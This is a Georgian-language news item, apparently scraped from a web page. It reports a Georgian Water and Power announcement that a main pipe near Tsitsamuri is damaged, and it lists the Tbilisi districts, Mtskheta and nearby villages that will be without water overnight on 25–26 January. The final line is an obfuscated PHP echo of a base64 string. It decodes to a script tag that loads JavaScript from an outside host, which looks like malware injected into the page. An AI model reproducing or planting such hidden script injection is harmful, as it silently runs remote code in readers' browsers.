celsiusi
ავერსი საქკაბელი
საგურამოში, სოფელ წიწამურთან „ჯორჯიან უოთერ ენდ ფაუერის“ წყალსადენის მაგისტრალური მილი, რომლიც ვაკე-საბურთალოს, დიდუბისა და გლდანის რაიონების ნაწილს სასმელი წყლით ამარაგებს, ავარიულად დაზიანდა, – ამის შესახებ ნათქვამია ​„ჯორჯიან უოთერ ენდ ფაუერის“ სპეციალურ განცხადებაში.
კომპანიის ინფორმაციით, ტექნიკური ჯგუფი ადგილზეა მობილიზებული და დაზიანების აღსადგენად მოსამზადებელი სამუშაოები მიმდინარეობს.
„გადაუდებელი სამუშაოები დღეს, 25 იანვარს საღამოს 21:00 საათიდან დაიწყება და მთელი ღამის განმავლობაში ინტენსიურ რეჟიმში შესრულდება.
აღნიშნულთან დაკავშირებით, აუცილებელია მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც დღეს, 25 იანვარს საღამოს 21:00 საათიდან ხვალ, 26 იანვრის დღის 12:00 საათამდე წყალმომარაგება შეეზღუდება:
ვაკე-საბურთალოს რაიონში – ნუცუბიძის I-V მიკრორაიონებს, ნუცუბიძის ქუჩას, ვაჟა-ფშაველას I, II, IV-VII კვარტლებს, ვაჟა-ფშაველას III კვარტალის ნაწილს, ვაჟა-ფშაველასა და ყაზბეგის გამზირის ნაწილს, ბუდაპეშტისა და ონიაშვილის ქუჩების ნაწილს, ქავთარაძის, შავგულიძის, პოლიტკოვსკაიას, მხატვართა, ბარათაშვილის, სხირტლაძის, გამრეკელის, გურიელის, ნადარეიშვილის, დელისის, თავხელიძის ქუჩის ნაწილს, პიკასოს, სანდრო ეულის, გელოვანის, გოძიაშვილის, ზალდასტანიშვილების, ჩიქოვანის და მიმდებარე ქუჩებს; სოფელ თხინვალას, სოფელ დიღომში: გიორგი ბრწყინვალის, აღმაშენებლის, ხანძთელის, ჯავახიშვილის და მიმდებარე ქუჩებს.
გლდანის რაიონში – ზაჰესში: წინამძღვრიშვილის, თავისუფლების, კეცხოველის, ავჭალის და მიმდებარე ქუჩებს. ქალაქ მცხეთას, სოფელ ნატახტარს, სოფელ წიწამურს.
დიდუბის რაიონში – დიღმის მასივის I კვარტალის ნაწილს.
„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.
წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას „ჯორჯიან უოთერ ენდ ფაუერი“ აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, „ფეისბუქისა“ და ვებგვერდის მეშვეობით www.gwp.ge“, – აღნიშნულია განცხადებაში. 
255
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");